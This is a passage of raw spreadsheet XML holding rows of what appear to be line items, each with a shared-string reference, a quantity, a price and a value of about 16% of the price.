      <c r="H388" s="10">
        <v>4</v>
      </c>
      <c r="I388" s="14">
        <v>420.22</v>
      </c>
      <c r="J388" s="15">
        <v>67.2384</v>
      </c>
      <c r="K388" s="16"/>
    </row>
    <row r="389" spans="2:11">
      <c r="B389" s="9">
        <v>414</v>
      </c>
      <c r="C389" s="238" t="s">
        <v>5626</v>
      </c>
      <c r="D389" s="238" t="s">
        <v>5543</v>
      </c>
      <c r="E389" s="238" t="s">
        <v>5478</v>
      </c>
      <c r="F389" s="238" t="s">
        <v>5627</v>
      </c>
      <c r="G389" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H389" s="10">
        <v>2</v>
      </c>
      <c r="I389" s="14">
        <v>76.92</v>
      </c>
      <c r="J389" s="15">
        <v>12.3072</v>
      </c>
      <c r="K389" s="16"/>
    </row>
    <row r="390" spans="2:11">
      <c r="B390" s="9">
        <v>415</v>
      </c>
      <c r="C390" s="238" t="s">
        <v>5628</v>
      </c>
      <c r="D390" s="9"/>
      <c r="E390" s="238" t="s">
        <v>5629</v>
      </c>
      <c r="F390" s="9"/>
      <c r="G390" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H390" s="10">
        <v>9</v>
      </c>
      <c r="I390" s="14">
        <v>207.12</v>
      </c>
      <c r="J390" s="15">
        <v>33.1344</v>
      </c>
      <c r="K390" s="16"/>
    </row>
    <row r="391" spans="2:11">
      <c r="B391" s="9">
        <v>416</v>
      </c>
      <c r="C391" s="238" t="s">
        <v>5630</v>
      </c>
      <c r="D391" s="238" t="s">
        <v>5631</v>
      </c>
      <c r="E391" s="238" t="s">
        <v>5632</v>
      </c>
      <c r="F391" s="9"/>
      <c r="G391" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H391" s="10">
        <v>200</v>
      </c>
      <c r="I391" s="14">
        <v>82.05</v>
      </c>
      <c r="J391" s="15">
        <v>13.12</v>
      </c>
      <c r="K391" s="16"/>
    </row>
    <row r="392" spans="2:11">
      <c r="B392" s="9">
        <v>417</v>
      </c>
      <c r="C392" s="238" t="s">
        <v>5633</v>
      </c>
      <c r="D392" s="9"/>
      <c r="E392" s="238" t="s">
        <v>5634</v>
      </c>
      <c r="F392" s="9"/>
      <c r="G392" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H392" s="10">
        <v>2</v>
      </c>
      <c r="I392" s="14">
        <v>3.42</v>
      </c>
      <c r="J392" s="15">
        <v>0.5472</v>
      </c>
      <c r="K392" s="16"/>
    </row>
    <row r="393" spans="2:11">
      <c r="B393" s="9">
        <v>418</v>
      </c>
      <c r="C393" s="238" t="s">
        <v>5635</v>
      </c>
      <c r="D393" s="238" t="s">
        <v>5636</v>
      </c>
      <c r="E393" s="238" t="s">
        <v>5549</v>
      </c>
      <c r="F393" s="238" t="s">
        <v>5637</v>
      </c>
      <c r="G393" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H393" s="10">
        <v>1</v>
      </c>
      <c r="I393" s="14">
        <v>25.64</v>
      </c>
      <c r="J393" s="15">
        <v>4.1024</v>
      </c>
      <c r="K393" s="16"/>
    </row>
    <row r="394" spans="2:11">
      <c r="B394" s="9">
        <v>419</v>
      </c>
      <c r="C394" s="238" t="s">
        <v>5638</v>
      </c>
      <c r="D394" s="238" t="s">
        <v>5639</v>
      </c>
      <c r="E394" s="238" t="s">
        <v>5640</v>
      </c>
      <c r="F394" s="238" t="s">
        <v>5641</v>
      </c>
      <c r="G394" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H394" s="10">
        <v>5</v>
      </c>
      <c r="I394" s="14">
        <v>876.07</v>
      </c>
      <c r="J394" s="15">
        <v>140.168</v>
      </c>
      <c r="K394" s="16"/>
    </row>
    <row r="395" spans="2:11">
      <c r="B395" s="9">
        <v>420</v>
      </c>
      <c r="C395" s="238" t="s">
        <v>5642</v>
      </c>
      <c r="D395" s="238" t="s">
        <v>5643</v>
      </c>
      <c r="E395" s="238" t="s">
        <v>5503</v>
      </c>
      <c r="F395" s="238" t="s">
        <v>5644</v>
      </c>
      <c r="G395" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H395" s="10">
        <v>27</v>
      </c>
      <c r="I395" s="14">
        <v>201.32</v>
      </c>
      <c r="J395" s="15">
        <v>32.2272</v>
      </c>
      <c r="K395" s="16"/>
    </row>
    <row r="396" spans="2:11">
      <c r="B396" s="9">
        <v>421</v>
      </c>
      <c r="C396" s="238" t="s">
        <v>5645</v>
      </c>
      <c r="D396" s="238" t="s">
        <v>5646</v>
      </c>
      <c r="E396" s="238" t="s">
        <v>5647</v>
      </c>
      <c r="F396" s="9"/>
      <c r="G396" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H396" s="10">
        <v>8</v>
      </c>
      <c r="I396" s="14">
        <v>2051.28</v>
      </c>
      <c r="J396" s="15">
        <v>328.2048</v>
      </c>
      <c r="K396" s="16"/>
    </row>
    <row r="397" spans="2:11">
      <c r="B397" s="9">
        <v>422</v>
      </c>
      <c r="C397" s="238" t="s">
        <v>5648</v>
      </c>
      <c r="D397" s="9"/>
      <c r="E397" s="238" t="s">
        <v>5649</v>
      </c>
      <c r="F397" s="9"/>
      <c r="G397" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H397" s="10">
        <v>2</v>
      </c>
      <c r="I397" s="14">
        <v>512.82</v>
      </c>
      <c r="J397" s="15">
        <v>82.0512</v>
      </c>
      <c r="K397" s="16"/>
    </row>
    <row r="398" spans="2:11">
      <c r="B398" s="9">
        <v>423</v>
      </c>
      <c r="C398" s="238" t="s">
        <v>5650</v>
      </c>
      <c r="D398" s="238" t="s">
        <v>5651</v>
      </c>
      <c r="E398" s="238" t="s">
        <v>5652</v>
      </c>
      <c r="F398" s="238" t="s">
        <v>5653</v>
      </c>
      <c r="G398" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H398" s="10">
        <v>5</v>
      </c>
      <c r="I398" s="14">
        <v>79.37</v>
      </c>
      <c r="J398" s="15">
        <v>12.696</v>
      </c>
      <c r="K398" s="16"/>
    </row>
    <row r="399" spans="2:11">
      <c r="B399" s="9">
        <v>424</v>
      </c>
      <c r="C399" s="238" t="s">
        <v>5654</v>
      </c>
      <c r="D399" s="238" t="s">
        <v>5655</v>
      </c>
      <c r="E399" s="238" t="s">
        <v>5656</v>
      </c>
      <c r="F399" s="9"/>
      <c r="G399" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H399" s="10">
        <v>28</v>
      </c>
      <c r="I399" s="14">
        <v>1238.16</v>
      </c>
      <c r="J399" s="15">
        <v>198.1056</v>
      </c>
      <c r="K399" s="16"/>
    </row>
    <row r="400" spans="2:11">
      <c r="B400" s="9">
        <v>425</v>
      </c>
      <c r="C400" s="238" t="s">
        <v>5657</v>
      </c>
      <c r="D400" s="238" t="s">
        <v>5595</v>
      </c>
      <c r="E400" s="238" t="s">
        <v>5658</v>
      </c>
      <c r="F400" s="238" t="s">
        <v>5597</v>
      </c>
      <c r="G400" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H400" s="10">
        <v>23</v>
      </c>
      <c r="I400" s="14">
        <v>1901.45</v>
      </c>
      <c r="J400" s="15">
        <v>304.2256</v>
      </c>
      <c r="K400" s="16"/>
    </row>
    <row r="401" spans="2:11">
      <c r="B401" s="9">
        <v>426</v>
      </c>
      <c r="C401" s="238" t="s">
        <v>5659</v>
      </c>
      <c r="D401" s="238" t="s">
        <v>5660</v>
      </c>
      <c r="E401" s="238" t="s">
        <v>5661</v>
      </c>
      <c r="F401" s="238" t="s">
        <v>5662</v>
      </c>
      <c r="G401" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H401" s="10">
        <v>21</v>
      </c>
      <c r="I401" s="14">
        <v>631</v>
      </c>
      <c r="J401" s="15">
        <v>100.968</v>
      </c>
      <c r="K401" s="16"/>
    </row>
    <row r="402" spans="2:11">
      <c r="B402" s="9">
        <v>427</v>
      </c>
      <c r="C402" s="238" t="s">
        <v>5663</v>
      </c>
      <c r="D402" s="238" t="s">
        <v>5660</v>
      </c>
      <c r="E402" s="238" t="s">
        <v>5661</v>
      </c>
      <c r="F402" s="238" t="s">
        <v>5662</v>
      </c>
      <c r="G402" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H402" s="10">
        <v>11</v>
      </c>
      <c r="I402" s="14">
        <v>309.46</v>
      </c>
      <c r="J402" s="15">
        <v>49.5088</v>
      </c>
      <c r="K402" s="16"/>
    </row>
    <row r="403" spans="2:11">
      <c r="B403" s="9">
        <v>428</v>
      </c>
      <c r="C403" s="238" t="s">
        <v>5664</v>
      </c>
      <c r="D403" s="238" t="s">
        <v>5665</v>
      </c>
      <c r="E403" s="238" t="s">
        <v>5666</v>
      </c>
      <c r="F403" s="9"/>
      <c r="G403" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H403" s="10">
        <v>2</v>
      </c>
      <c r="I403" s="14">
        <v>162.38</v>
      </c>
      <c r="J403" s="15">
        <v>25.9808</v>
      </c>
      <c r="K403" s="16"/>
    </row>
    <row r="404" spans="2:11">
      <c r="B404" s="9">
        <v>429</v>
      </c>
      <c r="C404" s="238" t="s">
        <v>5667</v>
      </c>
      <c r="D404" s="238" t="s">
        <v>5485</v>
      </c>
      <c r="E404" s="238" t="s">
        <v>5486</v>
      </c>
      <c r="F404" s="238" t="s">
        <v>5668</v>
      </c>
      <c r="G404" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H404" s="10">
        <v>1</v>
      </c>
      <c r="I404" s="14">
        <v>1162.39</v>
      </c>
      <c r="J404" s="15">
        <v>185.9824</v>
      </c>
      <c r="K404" s="16"/>
    </row>
    <row r="405" spans="2:11">
      <c r="B405" s="9">
        <v>430</v>
      </c>
      <c r="C405" s="238" t="s">
        <v>5669</v>
      </c>
      <c r="D405" s="238" t="s">
        <v>5557</v>
      </c>
      <c r="E405" s="238" t="s">
        <v>5558</v>
      </c>
      <c r="F405" s="238" t="s">
        <v>5670</v>
      </c>
      <c r="G405" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H405" s="10">
        <v>3</v>
      </c>
      <c r="I405" s="14">
        <v>58.3</v>
      </c>
      <c r="J405" s="15">
        <v>9.3264</v>
      </c>
      <c r="K405" s="16"/>
    </row>
    <row r="406" spans="2:11">
      <c r="B406" s="9">
        <v>431</v>
      </c>
      <c r="C406" s="238" t="s">
        <v>5671</v>
      </c>
      <c r="D406" s="238" t="s">
        <v>5672</v>
      </c>
      <c r="E406" s="238" t="s">
        <v>5673</v>
      </c>
      <c r="F406" s="238" t="s">
        <v>5674</v>
      </c>
      <c r="G406" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H406" s="10">
        <v>13</v>
      </c>
      <c r="I406" s="14">
        <v>873.15</v>
      </c>
      <c r="J406" s="15">
        <v>139.7136</v>
      </c>
      <c r="K406" s="16"/>
    </row>
    <row r="407" spans="2:11">
      <c r="B407" s="9">
        <v>432</v>
      </c>
      <c r="C407" s="238" t="s">
        <v>5675</v>
      </c>
      <c r="D407" s="238" t="s">
        <v>5502</v>
      </c>
      <c r="E407" s="238" t="s">
        <v>5503</v>
      </c>
      <c r="F407" s="238" t="s">
        <v>5676</v>
      </c>
      <c r="G407" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H407" s="10">
        <v>20</v>
      </c>
      <c r="I407" s="14">
        <v>255.74</v>
      </c>
      <c r="J407" s="15">
        <v>40.928</v>
      </c>
      <c r="K407" s="16"/>
    </row>
    <row r="408" spans="2:11">
      <c r="B408" s="9">
        <v>433</v>
      </c>
      <c r="C408" s="238" t="s">
        <v>5677</v>
      </c>
      <c r="D408" s="9"/>
      <c r="E408" s="238" t="s">
        <v>5503</v>
      </c>
      <c r="F408" s="238" t="s">
        <v>5678</v>
      </c>
      <c r="G408" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H408" s="10">
        <v>7</v>
      </c>
      <c r="I408" s="14">
        <v>56.84</v>
      </c>
      <c r="J408" s="15">
        <v>9.0944</v>
      </c>
      <c r="K408" s="16"/>
    </row>
    <row r="409" spans="2:11">
      <c r="B409" s="9">
        <v>434</v>
      </c>
      <c r="C409" s="238" t="s">
        <v>5679</v>
      </c>
      <c r="D409" s="9"/>
      <c r="E409" s="238" t="s">
        <v>5558</v>
      </c>
      <c r="F409" s="238" t="s">
        <v>5680</v>
      </c>
      <c r="G409" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H409" s="10">
        <v>4</v>
      </c>
      <c r="I409" s="14">
        <v>119.66</v>
      </c>
      <c r="J409" s="15">
        <v>19.1488</v>
      </c>
      <c r="K409" s="16"/>
    </row>
    <row r="410" spans="2:11">
      <c r="B410" s="9">
        <v>435</v>
      </c>
      <c r="C410" s="238" t="s">
        <v>5681</v>
      </c>
      <c r="D410" s="9"/>
      <c r="E410" s="238" t="s">
        <v>5572</v>
      </c>
      <c r="F410" s="9"/>
      <c r="G410" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H410" s="10">
        <v>3</v>
      </c>
      <c r="I410" s="14">
        <v>567.76</v>
      </c>
      <c r="J410" s="15">
        <v>90.84</v>
      </c>
      <c r="K410" s="16"/>
    </row>
    <row r="411" spans="2:11">
      <c r="B411" s="9">
        <v>436</v>
      </c>
      <c r="C411" s="238" t="s">
        <v>5682</v>
      </c>
      <c r="D411" s="9"/>
      <c r="E411" s="238" t="s">
        <v>5683</v>
      </c>
      <c r="F411" s="238" t="s">
        <v>5684</v>
      </c>
      <c r="G411" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H411" s="10">
        <v>6</v>
      </c>
      <c r="I411" s="14">
        <v>1501.83</v>
      </c>
      <c r="J411" s="15">
        <v>240.2976</v>
      </c>
      <c r="K411" s="16"/>
    </row>
    <row r="412" spans="2:11">
      <c r="B412" s="9">
        <v>437</v>
      </c>
      <c r="C412" s="238" t="s">
        <v>5685</v>
      </c>
      <c r="D412" s="238" t="s">
        <v>5686</v>
      </c>
      <c r="E412" s="238" t="s">
        <v>5673</v>
      </c>
      <c r="F412" s="238" t="s">
        <v>5687</v>
      </c>
      <c r="G412" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H412" s="10">
        <v>1</v>
      </c>
      <c r="I412" s="14">
        <v>89.74</v>
      </c>
      <c r="J412" s="15">
        <v>14.3584</v>
      </c>
      <c r="K412" s="16"/>
    </row>
    <row r="413" spans="2:11">
      <c r="B413" s="9">
        <v>438</v>
      </c>
      <c r="C413" s="238" t="s">
        <v>5688</v>
      </c>
      <c r="D413" s="238" t="s">
        <v>5689</v>
      </c>
      <c r="E413" s="238" t="s">
        <v>5690</v>
      </c>
      <c r="F413" s="238" t="s">
        <v>5691</v>
      </c>
      <c r="G413" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H413" s="10">
        <v>6</v>
      </c>
      <c r="I413" s="14">
        <v>133.75</v>
      </c>
      <c r="J413" s="15">
        <v>21.3984</v>
      </c>
      <c r="K413" s="16"/>
    </row>
    <row r="414" spans="2:11">
      <c r="B414" s="9">
        <v>439</v>
      </c>
      <c r="C414" s="238" t="s">
        <v>5692</v>
      </c>
      <c r="D414" s="238" t="s">
        <v>5689</v>
      </c>
      <c r="E414" s="238" t="s">
        <v>5690</v>
      </c>
      <c r="F414" s="238" t="s">
        <v>5693</v>
      </c>
      <c r="G414" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H414" s="10">
        <v>3</v>
      </c>
      <c r="I414" s="14">
        <v>92.31</v>
      </c>
      <c r="J414" s="15">
        <v>14.7696</v>
      </c>
      <c r="K414" s="16"/>
    </row>
    <row r="415" spans="2:11">
      <c r="B415" s="9">
        <v>440</v>
      </c>
      <c r="C415" s="238" t="s">
        <v>5694</v>
      </c>
      <c r="D415" s="9"/>
      <c r="E415" s="238" t="s">
        <v>1287</v>
      </c>
      <c r="F415" s="238" t="s">
        <v>5695</v>
      </c>
      <c r="G415" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H415" s="10">
        <v>6</v>
      </c>
      <c r="I415" s="14">
        <v>346.16</v>
      </c>
      <c r="J415" s="15">
        <v>55.3824</v>
      </c>
      <c r="K415" s="16"/>
    </row>
    <row r="416" spans="2:11">
      <c r="B416" s="9">
        <v>441</v>
      </c>
      <c r="C416" s="238" t="s">
        <v>5696</v>
      </c>
      <c r="D416" s="238" t="s">
        <v>5697</v>
      </c>
      <c r="E416" s="238" t="s">
        <v>5698</v>
      </c>
      <c r="F416" s="9"/>
      <c r="G416" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H416" s="10">
        <v>9</v>
      </c>
      <c r="I416" s="14">
        <v>424.34</v>
      </c>
      <c r="J416" s="15">
        <v>67.896</v>
      </c>
      <c r="K416" s="16"/>
    </row>
    <row r="417" spans="2:11">
      <c r="B417" s="9">
        <v>442</v>
      </c>
      <c r="C417" s="238" t="s">
        <v>5699</v>
      </c>
      <c r="D417" s="238" t="s">
        <v>5700</v>
      </c>
      <c r="E417" s="238" t="s">
        <v>5701</v>
      </c>
      <c r="F417" s="238" t="s">
        <v>5702</v>
      </c>
      <c r="G417" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H417" s="10">
        <v>14</v>
      </c>
      <c r="I417" s="14">
        <v>40.37</v>
      </c>
      <c r="J417" s="15">
        <v>6.4512</v>
      </c>
      <c r="K417" s="16"/>
    </row>
    <row r="418" spans="2:11">
      <c r="B418" s="9">
        <v>443</v>
      </c>
      <c r="C418" s="238" t="s">
        <v>5703</v>
      </c>
      <c r="D418" s="238" t="s">
        <v>5700</v>
      </c>
      <c r="E418" s="238" t="s">
        <v>5701</v>
      </c>
      <c r="F418" s="238" t="s">
        <v>5704</v>
      </c>
      <c r="G418" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H418" s="10">
        <v>37</v>
      </c>
      <c r="I418" s="14">
        <v>129.98</v>
      </c>
      <c r="J418" s="15">
        <v>20.7792</v>
      </c>
      <c r="K418" s="16"/>
    </row>
    <row r="419" spans="2:11">
      <c r="B419" s="9">
        <v>444</v>
      </c>
      <c r="C419" s="238" t="s">
        <v>5705</v>
      </c>
      <c r="D419" s="238" t="s">
        <v>5700</v>
      </c>
      <c r="E419" s="238" t="s">
        <v>5701</v>
      </c>
      <c r="F419" s="238" t="s">
        <v>5706</v>
      </c>
      <c r="G419" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H419" s="10">
        <v>10</v>
      </c>
      <c r="I419" s="14">
        <v>68.38</v>
      </c>
      <c r="J419" s="15">
        <v>10.944</v>
      </c>
      <c r="K419" s="16"/>
    </row>
    <row r="420" spans="2:11">
      <c r="B420" s="9">
        <v>445</v>
      </c>
      <c r="C420" s="238" t="s">
        <v>5707</v>
      </c>
      <c r="D420" s="238" t="s">
        <v>5700</v>
      </c>
      <c r="E420" s="238" t="s">
        <v>5701</v>
      </c>
      <c r="F420" s="238" t="s">
        <v>5708</v>
      </c>
      <c r="G420" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H420" s="10">
        <v>6</v>
      </c>
      <c r="I420" s="14">
        <v>87.18</v>
      </c>
      <c r="J420" s="15">
        <v>13.9488</v>
      </c>
      <c r="K420" s="16"/>
    </row>
    <row r="421" spans="2:11">
      <c r="B421" s="9">
        <v>446</v>
      </c>
      <c r="C421" s="238" t="s">
        <v>5709</v>
      </c>
      <c r="D421" s="9"/>
      <c r="E421" s="238" t="s">
        <v>5710</v>
      </c>
      <c r="F421" s="238" t="s">
        <v>5711</v>
      </c>
      <c r="G421" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H421" s="10">
        <v>48</v>
      </c>
      <c r="I421" s="14">
        <v>180.77</v>
      </c>
      <c r="J421" s="15">
        <v>28.9536</v>
      </c>
      <c r="K421" s="16"/>
    </row>
    <row r="422" spans="2:11">
      <c r="B422" s="9">
        <v>447</v>
      </c>
      <c r="C422" s="238" t="s">
        <v>5712</v>
      </c>
      <c r="D422" s="9"/>
      <c r="E422" s="238" t="s">
        <v>5713</v>
      </c>
      <c r="F422" s="238" t="s">
        <v>5714</v>
      </c>
      <c r="G422" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H422" s="10">
        <v>9</v>
      </c>
      <c r="I422" s="14">
        <v>38.48</v>
      </c>
      <c r="J422" s="15">
        <v>6.1632</v>
      </c>
      <c r="K422" s="16"/>
    </row>
    <row r="423" spans="2:11">
      <c r="B423" s="9">
        <v>448</v>
      </c>
      <c r="C423" s="238" t="s">
        <v>5715</v>
      </c>
      <c r="D423" s="238" t="s">
        <v>5716</v>
      </c>
      <c r="E423" s="238" t="s">
        <v>5713</v>
      </c>
      <c r="F423" s="238" t="s">
        <v>5717</v>
      </c>
      <c r="G423" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H423" s="10">
        <v>46</v>
      </c>
      <c r="I423" s="14">
        <v>191.94</v>
      </c>
      <c r="J423" s="15">
        <v>30.6912</v>
      </c>
      <c r="K423" s="16"/>
    </row>
    <row r="424" spans="2:11">
      <c r="B424" s="9">
        <v>449</v>
      </c>
      <c r="C424" s="238" t="s">
        <v>5718</v>
      </c>
      <c r="D424" s="238" t="s">
        <v>5499</v>
      </c>
      <c r="E424" s="238" t="s">
        <v>5500</v>
      </c>
      <c r="F424" s="238" t="s">
        <v>5719</v>
      </c>
      <c r="G424" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H424" s="10">
        <v>20</v>
      </c>
      <c r="I424" s="14">
        <v>8.55</v>
      </c>
      <c r="J424" s="15">
        <v>1.376</v>
      </c>
      <c r="K424" s="16"/>
    </row>
    <row r="425" spans="2:11">
      <c r="B425" s="9">
        <v>450</v>
      </c>
      <c r="C425" s="238" t="s">
        <v>5720</v>
      </c>
      <c r="D425" s="238" t="s">
        <v>5474</v>
      </c>
      <c r="E425" s="238" t="s">
        <v>5475</v>
      </c>
      <c r="F425" s="238" t="s">
        <v>5721</v>
      </c>
      <c r="G425" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H425" s="10">
        <v>1</v>
      </c>
      <c r="I425" s="14">
        <v>38.47</v>
      </c>
      <c r="J425" s="15">
        <v>6.1552</v>
      </c>
      <c r="K425" s="16"/>
    </row>
    <row r="426" spans="2:11">
      <c r="B426" s="9">
        <v>451</v>
      </c>
      <c r="C426" s="238" t="s">
        <v>5722</v>
      </c>
      <c r="D426" s="238" t="s">
        <v>5723</v>
      </c>
      <c r="E426" s="238" t="s">
        <v>5710</v>
      </c>
      <c r="F426" s="238" t="s">
        <v>5724</v>
      </c>
      <c r="G426" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H426" s="10">
        <v>11</v>
      </c>
      <c r="I426" s="14">
        <v>65.85</v>
      </c>
      <c r="J426" s="15">
        <v>10.5424</v>
      </c>
      <c r="K426" s="16"/>
    </row>
    <row r="427" spans="2:11">
      <c r="B427" s="9">
        <v>453</v>
      </c>
      <c r="C427" s="238" t="s">
        <v>5725</v>
      </c>
      <c r="D427" s="238" t="s">
        <v>4824</v>
      </c>
      <c r="E427" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="F427" s="238" t="s">
        <v>5726</v>
      </c>
      <c r="G427" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H427" s="10">
        <v>1</v>
      </c>
      <c r="I427" s="14">
        <v>811.97</v>
      </c>
      <c r="J427" s="15">
        <v>129.9152</v>
      </c>
      <c r="K427" s="16"/>
    </row>
    <row r="428" spans="2:11">
      <c r="B428" s="9">
        <v>454</v>
      </c>
      <c r="C428" s="238" t="s">
        <v>5727</v>
      </c>
      <c r="D428" s="238" t="s">
        <v>5728</v>
      </c>
      <c r="E428" s="238" t="s">
        <v>5729</v>
      </c>
      <c r="F428" s="238" t="s">
        <v>5730</v>
      </c>
      <c r="G428" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H428" s="10">
        <v>3</v>
      </c>
      <c r="I428" s="14">
        <v>20.51</v>
      </c>
      <c r="J428" s="15">
        <v>3.2832</v>
      </c>
      <c r="K428" s="16"/>
    </row>
    <row r="429" spans="2:11">
      <c r="B429" s="9">
        <v>455</v>
      </c>
      <c r="C429" s="238" t="s">
        <v>5731</v>
      </c>
      <c r="D429" s="238" t="s">
        <v>5732</v>
      </c>
      <c r="E429" s="238" t="s">
        <v>5513</v>
      </c>
      <c r="F429" s="9"/>
      <c r="G429" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H429" s="10">
        <v>1</v>
      </c>
      <c r="I429" s="14">
        <v>6.83</v>
      </c>
      <c r="J429" s="15">
        <v>1.0928</v>
      </c>
      <c r="K429" s="16"/>
    </row>
    <row r="430" spans="2:11">
      <c r="B430" s="9">
        <v>456</v>
      </c>
      <c r="C430" s="238" t="s">
        <v>5733</v>
      </c>
      <c r="D430" s="9"/>
      <c r="E430" s="238" t="s">
        <v>5734</v>
      </c>
      <c r="F430" s="238" t="s">
        <v>5735</v>
      </c>
      <c r="G430" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H430" s="10">
        <v>5</v>
      </c>
      <c r="I430" s="14">
        <v>41.82</v>
      </c>
      <c r="J430" s="15">
        <v>6.688</v>
      </c>
      <c r="K430" s="16"/>
    </row>
    <row r="431" spans="2:11">
      <c r="B431" s="9">
        <v>457</v>
      </c>
      <c r="C431" s="238" t="s">
        <v>5736</v>
      </c>
      <c r="D431" s="9"/>
      <c r="E431" s="238" t="s">
        <v>5734</v>
      </c>
      <c r="F431" s="238" t="s">
        <v>5737</v>
      </c>
      <c r="G431" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H431" s="10">
        <v>7</v>
      </c>
      <c r="I431" s="14">
        <v>38.8</v>
      </c>
      <c r="J431" s="15">
        <v>6.2048</v>
      </c>
      <c r="K431" s="16"/>
    </row>
    <row r="432" spans="2:11">
      <c r="B432" s="9">
        <v>458</v>
      </c>
      <c r="C432" s="238" t="s">
        <v>5738</v>
      </c>
      <c r="D432" s="238" t="s">
        <v>5732</v>
      </c>
      <c r="E432" s="238" t="s">
        <v>5513</v>
      </c>
      <c r="F432" s="238" t="s">
        <v>5739</v>
      </c>
      <c r="G432" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H432" s="10">
        <v>5</v>
      </c>
      <c r="I432" s="14">
        <v>24.22</v>
      </c>
      <c r="J432" s="15">
        <v>3.872</v>
      </c>
      <c r="K432" s="16"/>
    </row>
    <row r="433" spans="2:11">
      <c r="B433" s="9">
        <v>459</v>
      </c>
      <c r="C433" s="238" t="s">
        <v>5740</v>
      </c>
      <c r="D433" s="238" t="s">
        <v>5741</v>
      </c>
      <c r="E433" s="238" t="s">
        <v>5742</v>
      </c>
      <c r="F433" s="9"/>
      <c r="G433" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H433" s="10">
        <v>5</v>
      </c>
      <c r="I433" s="14">
        <v>263.53</v>
      </c>
      <c r="J433" s="15">
        <v>42.168</v>
      </c>
      <c r="K433" s="16"/>
    </row>
    <row r="434" spans="2:11">
      <c r="B434" s="9">
        <v>461</v>
      </c>
      <c r="C434" s="238" t="s">
        <v>5743</v>
      </c>
      <c r="D434" s="238" t="s">
        <v>5744</v>
      </c>
      <c r="E434" s="238" t="s">
        <v>5745</v>
      </c>
      <c r="F434" s="9"/>
      <c r="G434" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H434" s="10">
        <v>3</v>
      </c>
      <c r="I434" s="14">
        <v>1230.76</v>
      </c>
      <c r="J434" s="15">
        <v>196.92</v>
      </c>
      <c r="K434" s="16"/>
    </row>
    <row r="435" spans="2:11">
      <c r="B435" s="9">
        <v>462</v>
      </c>
      <c r="C435" s="238" t="s">
        <v>5746</v>
      </c>
      <c r="D435" s="9"/>
      <c r="E435" s="238" t="s">
        <v>5747</v>
      </c>
      <c r="F435" s="238" t="s">
        <v>5748</v>
      </c>
      <c r="G435" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H435" s="10">
        <v>1</v>
      </c>
      <c r="I435" s="14">
        <v>15.1</v>
      </c>
      <c r="J435" s="15">
        <v>2.416</v>
      </c>
      <c r="K435" s="16"/>
    </row>
    <row r="436" spans="2:11">
      <c r="B436" s="9">
        <v>463</v>
      </c>
      <c r="C436" s="238" t="s">
        <v>5749</v>
      </c>
      <c r="D436" s="9"/>
      <c r="E436" s="238" t="s">
        <v>5750</v>
      </c>
      <c r="F436" s="238" t="s">
        <v>5751</v>
      </c>
      <c r="G436" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H436" s="10">
        <v>1</v>
      </c>
      <c r="I436" s="14">
        <v>358.97</v>
      </c>
      <c r="J436" s="15">
        <v>57.4352</v>
      </c>
      <c r="K436" s="16"/>
    </row>
    <row r="437" spans="2:11">
      <c r="B437" s="9">
        <v>464</v>
      </c>
      <c r="C437" s="238" t="s">
        <v>5752</v>
      </c>
      <c r="D437" s="238" t="s">
        <v>5502</v>
      </c>
      <c r="E437" s="238" t="s">
        <v>5503</v>
      </c>
      <c r="F437" s="238" t="s">
        <v>5753</v>
      </c>
      <c r="G437" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H437" s="10">
        <v>10</v>
      </c>
      <c r="I437" s="14">
        <v>792.84</v>
      </c>
      <c r="J437" s="15">
        <v>126.848</v>
      </c>
      <c r="K437" s="16"/>
    </row>
    <row r="438" spans="2:11">
      <c r="B438" s="9">
        <v>465</v>
      </c>
      <c r="C438" s="238" t="s">
        <v>5754</v>
      </c>
      <c r="D438" s="238" t="s">
        <v>5716</v>
      </c>
      <c r="E438" s="238" t="s">
        <v>5713</v>
      </c>
      <c r="F438" s="238" t="s">
        <v>5755</v>
      </c>
      <c r="G438" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H438" s="10">
        <v>24</v>
      </c>
      <c r="I438" s="14">
        <v>61.6</v>
      </c>
      <c r="J438" s="15">
        <v>9.8688</v>
      </c>
      <c r="K438" s="16"/>
